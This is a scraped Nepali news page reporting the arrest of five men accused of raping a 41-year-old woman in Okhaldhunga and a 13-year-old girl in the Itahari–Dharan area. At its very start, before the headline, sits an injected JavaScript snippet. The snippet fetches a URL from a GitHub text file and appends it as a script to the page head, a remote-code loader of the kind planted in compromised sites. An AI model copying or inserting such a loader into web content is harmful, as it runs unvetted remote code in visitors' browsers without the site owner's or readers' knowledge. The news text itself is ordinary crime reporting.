;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ओखलढुङ्गामा ४१ वर्षीय महिला र ईटहरीमा १३ वर्षीय बालिकालाई करणी गरेको अभियोगमा ५ जना पक्राउ – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • ओखलढुङ्गामा ४१ वर्षीय महिला र ईटहरीमा १३ वर्षीय बालिकालाई करणी गरेको अभियोगमा ५ जना पक्राउ
दुर्घटना/अपराध

ओखलढुङ्गामा ४१ वर्षीय महिला र ईटहरीमा १३ वर्षीय बालिकालाई करणी गरेको अभियोगमा ५ जना पक्राउ

कात्तिक १९,
ओखलढुंगा । ओखलढुङ्गाको मानेभन्ज्याङ गाउँपालिका-३ सार्की गाउँकि ४१ वर्षीया महिलालाई जबरजस्ती करणी गरेको अभियोगमा एक जना पक्राउ परेका छन् ।

पक्राउ पर्नेमा सोही ठाउँका २२ वर्षीय सुशिल सार्की रहेका छन् । उनलाई गत सोमबार साँझ प्रहरीले पक्राउ गरेको जिल्ला प्रहरी कार्यालयले जानकारी दिएको छ । सार्कीले ती महिलालाई सोही ठाउँस्थित लिब्जु न्यूस्टार युवा क्लवको भवन आँगनमा जबरजस्ती करणी गरेका थिए ।
त्यस्तै १३ वर्षीया बालिकालाई जबरजस्ती करणी गरेको अभियोगमा ईटहरी उपमहानगरपालिका-१८ घर भएका २२ वर्षीय टेक नारायण चौधरी लगायत ३ जनालाई मंगलबार बिहान प्रहरीले पक्राउ गरेको छ ।

उनीहरूले ती बालिकालाई धरान उपमहानगरपालिका-१० पुतली लाईन रमाईलो चोकस्थित निर्माणाधिन भवनमा जबरजस्ती करणी गरेका थिए । उनीहरुलाई ईलाका प्रहरी कार्यालय धरानबाट खटिएको प्रहरीले  पक्राउ गरेको हो ।

दुबै घटनाका बारेका प्रहरीले थप अनुसन्धान गरिरहेको छ ।file Photo

फेसबुक प्रतिक्रियाहरु